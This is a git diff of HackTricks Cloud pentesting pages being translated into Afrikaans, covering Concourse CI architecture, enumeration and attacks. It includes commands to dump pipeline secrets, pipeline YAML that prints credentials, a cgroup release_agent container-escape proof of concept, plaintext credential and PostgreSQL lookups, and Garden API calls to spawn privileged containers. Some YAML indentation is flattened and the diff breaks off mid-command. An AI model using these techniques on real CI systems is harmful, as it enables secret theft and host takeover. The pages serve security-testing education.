aan **ELKEEN** te gee en ander **baie oop beleide** wat nie aanbeveel word nie, tensy 100% noodsaaklik. #### Service Auth -- [ ] Check that all service tokens **expires in 1 year or less** +- [ ] Kontroleer dat alle diens tokens **verval in 1 jaar of minder** #### Tunnels 
@@ -50,16 +50,12 @@ TODO ### Logs -- [ ] You could search for **unexpected actions** from users +- [ ] Jy kan soek na **onverwagte aksies** van gebruikers ### Settings -- [ ] Check the **plan type** -- [ ] It's possible to see the **credits card owner name**, **last 4 digits**, **expiration** date and **address** -- [ ] It's recommended to **add a User Seat Expiration** to remove users that doesn't really use this service +- [ ] Kontroleer die **plan tipe** +- [ ] Dit is moontlik om die **kredietkaart eienaar se naam**, **laaste 4 syfers**, **verval** datum en **adres** te sien +- [ ] Dit word aanbeveel om 'n **User Seat Expiration** toe te voeg om gebruikers te verwyder wat hierdie diens nie regtig gebruik nie {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/concourse-security/README.md b/src/pentesting-ci-cd/concourse-security/README.md index bcf20facf..7f4875137 100644 --- a/src/pentesting-ci-cd/concourse-security/README.md +++ b/src/pentesting-ci-cd/concourse-security/README.md 
@@ -2,36 +2,32 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Basiese Inligting -Concourse allows you to **build pipelines** to automatically run tests, actions and build images whenever you need it (time based, when something happens...) +Concourse laat jou toe om **pype** te bou om outomaties toetse, aksies en beelde te loop wanneer jy dit nodig het (tydgebaseerd, wanneer iets gebeur...) -## Concourse Architecture +## Concourse Argitektuur -Learn how the concourse environment is structured in: +Leer hoe die concourse omgewing gestruktureer is in: {{#ref}} concourse-architecture.md {{#endref}} -## Concourse Lab +## Concourse Laboratorium -Learn how you can run a concourse environment locally to do your own tests in: +Leer hoe jy 'n concourse omgewing plaaslik kan loop om jou eie toetse te doen in: {{#ref}} concourse-lab-creation.md {{#endref}} -## Enumerate & Attack Concourse +## Tel & Aanval Concourse -Learn how you can enumerate the concourse environment and abuse it in: +Leer hoe jy die concourse omgewing kan tel en misbruik in: {{#ref}} concourse-enumeration-and-attacks.md {{#endref}} {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md index d70167906..7c9647434 100644 --- a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md +++ b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md 
@@ -1,42 +1,38 @@ -# Concourse Architecture +# Concourse-argitektuur -## Concourse Architecture +## Concourse-argitektuur {{#include ../../banners/hacktricks-training.md}} -[**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html) +[**Relevante data uit Concourse-dokumentasie:**](https://concourse-ci.org/internals.html) -### Architecture +### Argitektuur ![](<../../images/image (187).png>) -#### ATC: web UI & build scheduler +#### ATC: web UI & bou skeduler -The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs). +Die ATC is die hart van Concourse. Dit bestuur die **web UI en API** en is verantwoordelik vir alle pyplyn **skedulering**. Dit **verbind met PostgreSQL**, wat dit gebruik om pyplyn data (insluitend bou logs) te stoor. -The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes. +Die [checker](https://concourse-ci.org/checker.html)'s verantwoordelikheid is om voortdurend na nuwe weergawes van hulpbronne te kyk. Die [scheduler](https://concourse-ci.org/scheduler.html) is verantwoordelik vir die skedulering van boue vir 'n werk en die [build tracker](https://concourse-ci.org/build-tracker.html) is verantwoordelik vir die uitvoering van enige geskeduleerde boue. 
Die [garbage collector](https://concourse-ci.org/garbage-collector.html) is die opruimingsmeganisme vir die verwydering van enige onbenutte of verouderde voorwerpe, soos houers en volumes. -#### TSA: worker registration & forwarding +#### TSA: werker registrasie & forwarding -The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc). +Die TSA is 'n **aangepaste SSH-bediener** wat slegs gebruik word vir die veilige **registrasie** van [**werkers**](https://concourse-ci.org/internals.html#architecture-worker) met die [ATC](https://concourse-ci.org/internals.html#component-atc). -The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer. +Die TSA luister **standaard op poort `2222`**, en is gewoonlik saam met die [ATC](https://concourse-ci.org/internals.html#component-atc) en sit agter 'n laaibalans. -The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa). +Die **TSA implementeer CLI oor die SSH-verbinding,** wat [**hierdie opdragte**](https://concourse-ci.org/internals.html#component-tsa) ondersteun. -#### Workers +#### Werkers -In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim). +Om take uit te voer, moet Concourse 'n paar werkers hĂȘ. 
Hierdie werkers **registreer hulleself** via die [TSA](https://concourse-ci.org/internals.html#component-tsa) en bestuur die dienste [**Garden**](https://github.com/cloudfoundry-incubator/garden) en [**Baggageclaim**](https://github.com/concourse/baggageclaim). -- **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**. -- **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**. +- **Garden**: Dit is die **Container Manage API**, gewoonlik bedryf in **poort 7777** via **HTTP**. +- **Baggageclaim**: Dit is die **Volume Management API**, gewoonlik bedryf in **poort 7788** via **HTTP**. -## References +## Verwysings - [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md index 4b778a804..38125201d 100644 --- a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md +++ b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md 
@@ -6,213 +6,202 @@ ### User Roles & Permissions -Concourse comes with five roles: +Concourse kom met vyf rolle: -- _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC. -- **owner**: Team owners can **modify everything within the team**. -- **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings. -- **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations. -- **viewer**: Team viewers have **"read-only" access to a team** and its pipelines. +- _Concourse_ **Admin**: Hierdie rol word slegs aan eienaars van die **hoofspan** (standaard aanvanklike concourse-span) gegee. Admins kan **ander spanne konfigureer** (bv.: `fly set-team`, `fly destroy-team`...). Die toestemmings van hierdie rol kan nie deur RBAC beĂŻnvloed word nie. +- **eienaar**: Span eienaars kan **alles binne die span wysig**. +- **lid**: Span lede kan **lees en skryf** binne die **span se bates** maar kan nie die spaninstellings wysig nie. +- **pipeline-operator**: Pipeline operators kan **pipeline operasies** uitvoer soos om boue te aktiveer en hulpbronne vas te pen, maar hulle kan nie pipeline konfigurasies opdateer nie. +- **kyker**: Span kykers het **"lees-slegs" toegang tot 'n span** en sy pipelines. > [!NOTE] -> Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically it's actions). 
Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html) +> Boonop kan die **toestemmings van die rolle eienaar, lid, pipeline-operator en kyker gewysig word** deur RBAC te konfigureer (meer spesifiek, sy aksies). Lees meer daaroor in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html) -Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them. +Let daarop dat Concourse **pipeliner binne Spanne groepeer**. Daarom sal gebruikers wat aan 'n Span behoort, in staat wees om daardie pipelines te bestuur en **verskeie Spanne** mag bestaan. 'n Gebruiker kan aan verskeie Spanne behoort en verskillende toestemmings binne elkeen hĂȘ. ### Vars & Credential Manager -In the YAML configs you can configure values using the syntax `((_source-name_:_secret-path_._secret-field_))`.\ -[From the docs:](https://concourse-ci.org/vars.html#var-syntax) The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\ -The **optional \_secret-field**\_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\ -Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`. 
+In die YAML konfigurasies kan jy waardes konfigureer met die sintaksis `((_source-name_:_secret-path_._secret-field_))`.\ +[Van die dokumentasie:](https://concourse-ci.org/vars.html#var-syntax) Die **source-name is opsioneel**, en as dit weggelaat word, sal die [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) gebruik word, of die waarde kan [staties](https://concourse-ci.org/vars.html#static-vars) verskaf word.\ +Die **opsionele \_secret-field**\_ spesifiseer 'n veld op die verkregen geheim om te lees. As dit weggelaat word, kan die credential manager kies om 'n 'standaard veld' van die verkregen credential te lees as die veld bestaan.\ +Boonop kan die _**secret-path**_ en _**secret-field**_ omring word deur dubbele aanhalings `"..."` as hulle **spesiale karakters** soos `.` en `:` bevat. Byvoorbeeld, `((source:"my.secret"."field:1"))` sal die _secret-path_ op `my.secret` stel en die _secret-field_ op `field:1`. #### Static Vars -Static vars can be specified in **tasks steps**: - +Statische vars kan in **take stappe** gespesifiseer word: ```yaml - task: unit-1.13 - file: booklit/ci/unit.yml - vars: { tag: 1.13 } +file: booklit/ci/unit.yml +vars: { tag: 1.13 } ``` +Or gebruik die volgende `fly` **argumente**: -Or using the following `fly` **arguments**: +- `-v` of `--var` `NAME=VALUE` stel die string `VALUE` as die waarde vir die var `NAME` in. +- `-y` of `--yaml-var` `NAME=VALUE` ontleed `VALUE` as YAML en stel dit as die waarde vir die var `NAME` in. +- `-i` of `--instance-var` `NAME=VALUE` ontleed `VALUE` as YAML en stel dit as die waarde vir die instance var `NAME` in. Sien [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) om meer te leer oor instance vars. +- `-l` of `--load-vars-from` `FILE` laai `FILE`, 'n YAML-dokument wat var name aan waardes koppel, en stel dit alles in. -- `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`. 
-- `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`. -- `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars. -- `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all. +#### Kredensiaalbestuur -#### Credential Management +Daar is verskillende maniere waarop 'n **Kredensiaalbestuurder gespesifiseer kan word** in 'n pyplyn, lees hoe in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\ +Boonop ondersteun Concourse verskillende kredensiaalbestuurders: -There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\ -Moreover, Concourse supports different credential managers: - -- [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html) -- [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html) -- [The AWS SSM credential manager](https://concourse-ci.org/aws-ssm-credential-manager.html) -- [The AWS Secrets Manager credential manager](https://concourse-ci.org/aws-asm-credential-manager.html) -- [Kubernetes Credential Manager](https://concourse-ci.org/kubernetes-credential-manager.html) -- [The Conjur credential manager](https://concourse-ci.org/conjur-credential-manager.html) -- [Caching credentials](https://concourse-ci.org/creds-caching.html) -- [Redacting credentials](https://concourse-ci.org/creds-redacting.html) -- [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html) +- [Die Vault kredensiaalbestuurder](https://concourse-ci.org/vault-credential-manager.html) +- [Die CredHub kredensiaalbestuurder](https://concourse-ci.org/credhub-credential-manager.html) +- [Die 
AWS SSM kredensiaalbestuurder](https://concourse-ci.org/aws-ssm-credential-manager.html) +- [Die AWS Secrets Manager kredensiaalbestuurder](https://concourse-ci.org/aws-asm-credential-manager.html) +- [Kubernetes Kredensiaalbestuurder](https://concourse-ci.org/kubernetes-credential-manager.html) +- [Die Conjur kredensiaalbestuurder](https://concourse-ci.org/conjur-credential-manager.html) +- [Kredensiale kas](https://concourse-ci.org/creds-caching.html) +- [Kredensiale redigering](https://concourse-ci.org/creds-redacting.html) +- [Herhaal mislukte verkrygings](https://concourse-ci.org/creds-retry-logic.html) > [!CAUTION] -> Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them. +> Let daarop dat as jy 'n soort **skrywe toegang tot Concourse** het, jy werksgeleenthede kan skep om **daardie geheime te onttrek** aangesien Concourse toegang tot hulle moet hĂȘ. -### Concourse Enumeration +### Concourse Enumerasie -In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token** probably in a `.flyrc` config file. +Om 'n concourse omgewing te enumerateer, moet jy eers **geldige kredensiale versamel** of 'n **geverifieerde token** vind waarskynlik in 'n `.flyrc` konfigurasie lĂȘer. 
-#### Login and Current User enum +#### Teken in en Huidige Gebruiker enum -- To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**: - - `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]` -- Get configured **targets**: - - `fly targets` -- Get if the configured **target connection** is still **valid**: - - `fly -t status` -- Get **role** of the user against the indicated target: - - `fly -t userinfo` +- Om in te teken, moet jy die **eindpunt**, die **spannaam** (standaard is `main`) en 'n **span waartoe die gebruiker behoort** weet: +- `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]` +- Kry geconfigureerde **teikens**: +- `fly targets` +- Kry of die geconfigureerde **teikenverbinding** steeds **geldig** is: +- `fly -t status` +- Kry die **rol** van die gebruiker teen die aangeduide teiken: +- `fly -t userinfo` > [!NOTE] -> Note that the **API token** is **saved** in `$HOME/.flyrc` by default, you looting a machines you could find there the credentials. +> Let daarop dat die **API token** **gestoor** word in `$HOME/.flyrc` per standaard, jy wat 'n masjien plunder, kan daar die kredensiale vind. 
-#### Teams & Users +#### Spanne & Gebruikers -- Get a list of the Teams - - `fly -t teams` -- Get roles inside team - - `fly -t get-team -n ` -- Get a list of users - - `fly -t active-users` +- Kry 'n lys van die Spanne +- `fly -t teams` +- Kry rolle binne die span +- `fly -t get-team -n ` +- Kry 'n lys van gebruikers +- `fly -t active-users` -#### Pipelines - -- **List** pipelines: - - `fly -t pipelines -a` -- **Get** pipeline yaml (**sensitive information** might be found in the definition): - - `fly -t get-pipeline -p ` -- Get all pipeline **config declared vars** - - `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done` -- Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them): +#### Pyplyne +- **Lys** pyplyne: +- `fly -t pipelines -a` +- **Kry** pyplyn yaml (**sensitiewe inligting** mag in die definisie gevind word): +- `fly -t get-pipeline -p ` +- Kry al die pyplyn **konfigurasie verklaarde vars** +- `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done` +- Kry al die **pyplyne geheime name wat gebruik word** (as jy 'n werk kan skep/wysig of 'n houer kan oorneem, kan jy hulle onttrek): ```bash rm /tmp/secrets.txt; for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do - echo $pipename; - fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt; - echo ""; +echo $pipename; +fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt; +echo ""; done echo "" echo "ALL SECRETS" cat /tmp/secrets.txt | sort | uniq rm /tmp/secrets.txt ``` +#### Houers & Werkers -#### Containers & Workers +- Lys **werkers**: +- `fly -t workers` +- Lys **houers**: +- `fly -t 
containers` +- Lys **boude** (om te sien wat aan die gang is): +- `fly -t builds` -- List **workers**: - - `fly -t workers` -- List **containers**: - - `fly -t containers` -- List **builds** (to see what is running): - - `fly -t builds` +### Concourse Aanvalle -### Concourse Attacks - -#### Credentials Brute-Force +#### Kredensiaal Brute-Force - admin:admin - test:test -#### Secrets and params enumeration +#### Geheimenisse en params enumerasie -In the previous section we saw how you can **get all the secrets names and vars** used by the pipeline. The **vars might contain sensitive info** and the name of the **secrets will be useful later to try to steal** them. +In die vorige afdeling het ons gesien hoe jy **alle geheime name en vars** wat deur die pyplyn gebruik word, kan **kry**. Die **vars kan sensitiewe inligting bevat** en die naam van die **geheimenisse sal nuttig wees later om te probeer om** hulle te steel. -#### Session inside running or recently run container - -If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `/` **container** using: +#### Sessie binne lopende of onlangs lopende houer +As jy genoeg voorregte het (**lid rol of meer**) sal jy in staat wees om **pyplyne en rolle te lys** en net 'n **sessie binne** die `/` **houer** te kry met: ```bash fly -t tutorial intercept --job pipeline-name/job-name fly -t tutorial intercept # To be presented a prompt with all the options ``` +Met hierdie toestemmings mag jy in staat wees om: -With these permissions you might be able to: +- **Die geheime** binne die **houer** te **steel** +- Probeer om te **ontsnap** na die node +- **Cloud metadata** eindpunt te **enumerate/benut** (van die pod en van die node, indien moontlik) -- **Steal the secrets** inside the **container** -- Try to **escape** to the node -- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible) - -#### Pipeline 
Creation/Modification - -If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example: +#### Pyplyn Skepping/Wysiging +As jy genoeg voorregte (**lid rol of meer**) het, sal jy in staat wees om **nuwe pyplyne te skep/wysig.** Kyk na hierdie voorbeeld: ```yaml jobs: - - name: simple - plan: - - task: simple-task - privileged: true - config: - # Tells Concourse which type of worker this task should run on - platform: linux - image_resource: - type: registry-image - source: - repository: busybox # images are pulled from docker hub by default - run: - path: sh - args: - - -cx - - | - echo "$SUPER_SECRET" - sleep 1000 - params: - SUPER_SECRET: ((super.secret)) +- name: simple +plan: +- task: simple-task +privileged: true +config: +# Tells Concourse which type of worker this task should run on +platform: linux +image_resource: +type: registry-image +source: +repository: busybox # images are pulled from docker hub by default +run: +path: sh +args: +- -cx +- | +echo "$SUPER_SECRET" +sleep 1000 +params: +SUPER_SECRET: ((super.secret)) ``` +Met die **wysiging/creatie** van 'n nuwe pyplyn sal jy in staat wees om: -With the **modification/creation** of a new pipeline you will be able to: +- **Steal** die **secrets** (deur dit uit te echo of binne die houer in te gaan en `env` te loop) +- **Escape** na die **node** (deur jou genoeg regte te gee - `privileged: true`) +- Enumereer/benut **cloud metadata** eindpunt (van die pod en van die node) +- **Delete** geskepte pyplyn -- **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`) -- **Escape** to the **node** (by giving you enough privileges - `privileged: true`) -- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node) -- **Delete** created pipeline - -#### Execute Custom Task - -This is similar to the previous method but instead of modifying/creating a whole new pipeline you can **just execute a 
custom task** (which will probably be much more **stealthier**): +#### Voer Aangepaste Taak Uit +Dit is soortgelyk aan die vorige metode, maar in plaas daarvan om 'n hele nuwe pyplyn te wysig/te skep, kan jy **net 'n aangepaste taak uitvoer** (wat waarskynlik baie meer **stealthier** sal wees): ```yaml # For more task_config options check https://concourse-ci.org/tasks.html platform: linux image_resource: - type: registry-image - source: - repository: ubuntu +type: registry-image +source: +repository: ubuntu run: - path: sh - args: - - -cx - - | - env - sleep 1000 +path: sh +args: +- -cx +- | +env +sleep 1000 params: - SUPER_SECRET: ((super.secret)) +SUPER_SECRET: ((super.secret)) ``` ```bash fly -t tutorial execute --privileged --config task_config.yml ``` +#### Ontsnapping na die node vanaf 'n bevoorregte taak -#### Escaping to the node from privileged task - -In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex". - -In the following PoC we are going to use the release_agent to escape with some small modifications: +In die vorige afdelings het ons gesien hoe om **'n bevoorregte taak met concourse uit te voer**. Dit sal nie die houer presies dieselfde toegang gee as die bevoorregte vlag in 'n docker-houer nie. Byvoorbeeld, jy sal nie die node lĂȘerstelsel toestel in /dev sien nie, so die ontsnapping kan meer "kompleks" wees. +In die volgende PoC gaan ons die release_agent gebruik om te ontsnap met 'n paar klein wysigings: ```bash # Mounts the RDMA cgroup controller and create a child cgroup # If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist" 
@@ -270,14 +259,12 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" # Reads the output cat /output ``` - > [!WARNING] -> As you might have noticed this is just a [**regular release_agent escape**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) just modifying the path of the cmd in the node +> Soos jy dalk opgemerk het, is dit net 'n [**gereelde release_agent ontsnapping**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) wat die pad van die cmd in die node aanpas -#### Escaping to the node from a Worker container - -A regular release_agent escape with a minor modification is enough for this: +#### Ontsnapping na die node vanaf 'n Werker-container +'n Gereelde release_agent ontsnapping met 'n klein aanpassing is genoeg hiervoor: ```bash mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x @@ -304,13 +291,11 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" # Reads the output cat /output ``` +#### Ontsnap na die node vanaf die Web-container -#### Escaping to the node from the Web container - -Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless). - -However, it stores **local credentials in clear text**: +Selfs al het die web-container 'n paar verdedigingstelsels gedeaktiveer, is dit **nie as 'n algemene bevoorregte container aan die gang nie** (byvoorbeeld, jy **kan nie** **monteer** nie en die **vermoĂ«ns** is baie **beperk**, so al die maklike maniere om uit die container te ontsnap is nutteloos). +Dit stoor egter **lokale geloofsbriewe in duidelike teks**: ```bash cat /concourse-auth/local-users test:test 
@@ -319,11 +304,9 @@ env | grep -i local_user CONCOURSE_MAIN_TEAM_LOCAL_USER=test CONCOURSE_ADD_LOCAL_USER=test:test ``` +Jy kan daardie geloofsbriewe gebruik om **in te log teen die webbediener** en **‘n bevoorregte houer te skep en na die node te ontsnap**. -You cloud use that credentials to **login against the web server** and **create a privileged container and escape to the node**. - -In the environment you can also find information to **access the postgresql** instance that concourse uses (address, **username**, **password** and database among other info): - +In die omgewing kan jy ook inligting vind om **toegang te verkry tot die postgresql** instansie wat concourse gebruik (adres, **gebruikersnaam**, **wagwoord** en databasis onder andere inligting): ```bash env | grep -i postg CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238 
@@ -344,39 +327,35 @@ select * from refresh_token; select * from teams; #Change the permissions of the users in the teams select * from users; ``` - -#### Abusing Garden Service - Not a real Attack +#### Misbruik van Garden Service - Nie 'n werklike aanval nie > [!WARNING] -> This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before +> Dit is net 'n paar interessante notas oor die diens, maar omdat dit net op localhost luister, sal hierdie notas geen impak hĂȘ wat ons nog nie voorheen uitgebuit het nie. -By default each concourse worker will be running a [**Garden**](https://github.com/cloudfoundry/garden) service in port 7777. This service is used by the Web master to indicate the worker **what he needs to execute** (download the image and run each task). This sound pretty good for an attacker, but there are some nice protections: +Standaard sal elke concourse werker 'n [**Garden**](https://github.com/cloudfoundry/garden) diens op poort 7777 uitvoer. Hierdie diens word deur die Web meester gebruik om die werker **te dui wat hy moet uitvoer** (aflaai van die beeld en elke taak uitvoer). Dit klink redelik goed vir 'n aanvaller, maar daar is 'n paar goeie beskermings: -- It's just **exposed locally** (127..0.0.1) and I think when the worker authenticates agains the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker. -- The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service. 
- -Concourse workers run with high container privileges: +- Dit is net **lokaal blootgestel** (127..0.0.1) en ek dink wanneer die werker teen die Web met die spesiale SSH-diens outentiseer, word 'n tonnel geskep sodat die webbediener **met elke Garden diens** binne elke werker kan **praat**. +- Die webbediener **monitor die lopende houers elke paar sekondes**, en **onverwagte** houers word **verwyder**. So as jy 'n **aangepaste houer** wil **uitvoer**, moet jy **inmeng** met die **kommunikasie** tussen die webbediener en die garden diens. +Concourse werkers loop met hoĂ« houer bevoegdhede: ``` Container Runtime: docker Has Namespaces: - pid: true - user: false +pid: true +user: false AppArmor Profile: kernel Capabilities: - BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read +BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read Seccomp: disabled ``` - However, techniques like **mounting** the /dev device of the node or release_agent **won't work** (as the real device with the filesystem of the node isn't accesible, only a virtual one). We cannot access processes of the node, so escaping from the node without kernel exploits get complicated. 
> [!NOTE] > In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**. -Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it. +Let wel, terwyl ek met concourse gespeel het, het ek opgemerk dat wanneer 'n nuwe container geskep word om iets te laat loop, die container prosesse vanaf die werker container toeganklik is, so dit is soos 'n container wat 'n nuwe container binne-in hom skep. **Getting inside a running privileged container** - ```bash # Get current container curl 127.0.0.1:7777/containers 
@@ -389,30 +368,26 @@ curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties # Execute a new process inside a container ## In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53 wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \ - --header='Content-Type:application/json' \ - 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' +--header='Content-Type:application/json' \ +'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' # OR instead of doing all of that, you could just get into the ns of the process of the privileged container nsenter --target 76011 --mount --uts --ipc --net --pid -- sh ``` +**Skep 'n nuwe bevoorregte houer** -**Creating a new privileged container** - -You can very easily create a new container (just run a random UID) and execute something on it: - +Jy kan baie maklik 'n nuwe houer skep (hardloop net 'n willekeurige UID) en iets daarop uitvoer: ```bash curl -X POST http://127.0.0.1:7777/containers \ - -H 'Content-Type: application/json' \ - -d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}' +-H 'Content-Type: application/json' \ +-d 
